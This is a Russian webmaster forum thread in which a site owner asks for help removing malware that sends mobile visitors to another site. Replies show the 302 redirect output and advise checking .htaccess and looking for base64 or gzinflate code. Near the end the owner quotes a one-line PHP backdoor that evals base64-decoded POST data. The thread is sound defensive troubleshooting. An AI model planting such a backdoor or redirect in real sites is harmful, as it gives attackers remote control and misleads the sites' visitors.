- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Тренды маркетинга в 2024 году: мобильные продажи, углубленная аналитика и ИИ
Экспертная оценка Адмитад
Оксана Мамчуева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
freezebreeze, подождем посмотрим, если что то вылезет то напишу
Яша опять прислал письмо :(
Опять то же самое, пишут что у меня "Мобильный редирект"
Ни как не могу ни че найти, сайт xtrackers . ru
Может кто то может увидеть этот вредоносный код?
yakes, каспер не ругается на http://xtrackers.ru/, но редирект имеется на http://flv- play. ru/
Чекайте на http://secu.ru/online-services/redirect
Яша опять прислал письмо :(
Опять то же самое, пишут что у меня "Мобильный редирект"
Ни как не могу ни че найти, сайт xtrackers . ru
Может кто то может увидеть этот вредоносный код?
редирект есть....
Resolving xtrackers.ru... 31.31.192.190
Connecting to xtrackers.ru|31.31.192.190|:80... connected.
HTTP request sent, awaiting response...
HTTP/1.1 302 Found
Server: nginx/0.8.54
Date: Sun, 10 Nov 2013 16:46:11 GMT
Content-Type: text/html; charset=cp1251
Connection: keep-alive
X-Powered-By: PHP/5.3.3
Location: http://news-dll.net/?1&referer=xtrackers.ru
Content-Length: 0
А как его найти? что мне с ним делать?
А как его найти? что мне с ним делать?
как найти - с помощью поиска в файлах сайта, что делать - удалить.
самый тупой случай - в .htaccess смотрите подозрительное содержимое.
скорее всего взломали через уязвимость в движке, влили вебшеллы и тд
то есть без обновлений будет такое повторяться.
servercraft, ну а что именно искать в файлах то?
Каспером все прогонял, чисто, еще несколькими антивирусами, то же чисто.
Может кто то может что то конкретное предложить?
servercraft, по ходу, у него на разные сайты редиректит.
---------- Добавлено 10.11.2013 в 20:15 ----------
yakes, скачайте ai-bolit на http://www.revisium.com/ai/ и проверьте им.
servercraft, по ходу, у него на разные сайты редиректит.
как возможный сценарий - в .htaccess RewriteCond если мобильный user-agent, правилo RewriteCond на вредоносный скрипт, а он уже сам куда надо редиректит, выдаваем хеадер Location:...
---------- Добавлено 10.11.2013 в 19:22 ----------
servercraft, ну а что именно искать в файлах то?
подозрительный код, всякие base64,gzinflate и тд
Вот это и есть вирусняк?
if(!empty($_POST['ups'])) eval(base64_decode($_POST['ups']));
@setlocale(LC_ALL, array("ru_RU.CP1251", "ru_SU.CP1251", "ru_RU.KOI8-r", "ru_RU", "russian", "ru_SU", "ru"));